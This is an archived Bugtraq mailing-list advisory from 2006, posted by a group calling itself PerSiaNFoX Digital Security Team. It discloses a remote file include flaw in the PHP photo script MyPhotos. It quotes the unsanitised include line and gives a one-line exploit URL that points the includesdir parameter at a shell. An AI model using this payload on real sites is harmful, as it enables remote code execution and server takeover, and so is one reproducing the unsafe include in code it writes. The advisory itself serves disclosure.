MyPhotos<= Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyPhotos<= Remote File Include Vulnerability
From: h4ck3riran@xxxxxxxxx
Date: 23 Sep 2006 13:38:21 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******************************************************************************
***                                                                             
                                                                                
    
***
***                                                                             
                                                                                
    
***
***                                                                             
                                                                                
    
***
***                                           PerSiaNFoX DigitaL 
SecuritY TeaM                                                 ***               
                                                                                
              
***                                                                             
                                                                                
    
***
***                                                                             
                                                                                
    
***
***                                                                             
                                                                                
    
***
*******************************************************************************

<# MyPhotos<= ( Remote File Include Vulnerability

<# Script.............. :MyPhotos
<#Download.....:http://jaist.dl.sourceforge.net/sourceforge/myphotos/myphotos-0.1.3b-beta.zip
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------

< # Code :
  include ("$includesdir/indextext.inc.php");

< # Expolit :

Www.Site.coM/[path]/index.php?includesdir=Sh3ll

Prev by Date: Opial Audio/Video Download Management - Version 1.0 index.php Xss vulns.
Next by Date: PhotoStore Multiple Cross-Site Scripting Vulnerabilities
Previous by thread: Opial Audio/Video Download Management - Version 1.0 index.php Xss vulns.
Next by thread: PhotoStore Multiple Cross-Site Scripting Vulnerabilities
Index(es):
- Date
- Thread